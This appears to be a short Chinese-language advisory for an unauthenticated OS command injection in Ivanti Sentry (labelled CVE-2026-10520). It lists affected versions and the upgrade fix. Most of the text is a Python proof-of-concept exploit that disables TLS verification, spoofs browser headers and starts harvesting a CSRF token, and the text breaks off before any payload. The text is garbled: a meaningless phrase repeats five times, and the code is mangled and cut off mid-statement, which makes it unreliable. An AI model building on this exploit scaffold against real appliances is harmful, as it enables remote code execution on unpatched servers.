漏洞概述 该漏洞是Ivanti Sentry Pre-Auth OS Command Injection(CVE-2026-10520),允许攻击者在无需认证的情况下执行任意操作系统命令。 影响范围 受影响版本:Ivanti Sentry 2021.1.0 至 2023.1.0 未受影响版本:2023.1.1 及更高版本 修复方案 升级版本:升级到 Ivanti Sentry 2023.1.1 或更高版本。 POC代码 检测伪影生成器 检测伪影生成器 检测伪影生成器 检测伪影生成器 检测伪影生成器 ```python import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def parse_args(): if len(sys.argv) ") sys.exit(1) return sys.argv[1] def get_session(target_url): session = requests.Session() session.verify = False session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-User': '?1', 'Sec-GPC': '1', 'Priority': 'u=0, i', 'TE': 'trailers' }) return session def exploit(session, target_url): Step 1: Get the initial page to retrieve the CSRF token response = session.get(target_url) if response.status_code != 200: print(f"Failed to get initial page: {response.status_code}") return Extract CSRF token from the response import re csrf_token